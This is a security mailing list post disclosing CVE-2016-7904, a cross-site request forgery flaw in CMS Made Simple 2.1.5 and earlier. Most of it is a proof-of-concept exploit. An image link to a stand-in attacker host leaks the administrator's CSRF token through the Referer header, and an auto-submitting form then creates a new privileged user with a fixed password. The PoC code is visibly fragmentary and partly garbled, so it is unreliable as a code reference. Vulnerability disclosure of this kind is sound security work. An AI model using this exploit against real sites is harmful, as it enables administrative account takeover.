Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 16 Jan 2017 10:17:29 +0800 (GMT+08:00)
From: "Hongkun Zeng" <>
To: oss-security <>
Subject: CVE-2016-7904: CMS Made Simple <= 2.1.5 CSRF

Vulnerability: CVE-2016-7904: CMS Made Simple <= 2.1.5 CSRF
CVE: CVE-2016-7904
Discovered by: Hongkun Zeng (

CMS Made Simple (CMSMS) is a free, open source (GPL) content management system (CMS) to provide developers, programmers and site owners a web-based development and administration area.

This is a security issue in CMSMS. Low privilege users were able to gain control of an administrative session through a CSRF attack.

Add article and insert image with link http://attacker/csrfpoc.php, and the referer would leak the users' csrf token.

//File: csrfpoc.php

if(!isset($_SERVER['HTTP_REFERER']) && !isset($_SESSION['_sk_']))

$parsed_url = parse_url($_SERVER['HTTP_REFERER']);
$query = isset($parsed_url['query']) ? '?' . $parsed_url['query'] : '';
$_SESSION['_sk_'] = $arr['_sk_'];

<form action='http://localhost:8012/admin/adduser.php' method='POST' id='form' enctype='multipart/form-data'>
<input type="text" name="_sk_" value="<?php echo $_SESSION['_sk_'];?>" />
<input type="text" name="user" value="test" />
<input type="text" name="password" value="123456" />
<input type="text" name="passwordagain" value="123456" />
<input type="text" name="firstname" value="" />
<input type="text" name="lastname" value="" />
<input type="text" name="email" value="" />
<input type="text" name="active" value="1" />
<input type="text" name="sel_groups[]" value="1" />
<input type="text" name="sel_groups[]" value="2" />
<input type="text" name="sel_groups[]" value="3" />
<input type="text" name="copyusersettings" value="-1" />
<input type="text" name="submit" value="submit" />
<script> document.createElement('form')'form')); </script> 



Best Regards,
Hongkun Zeng
hongkun.zeng (at)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ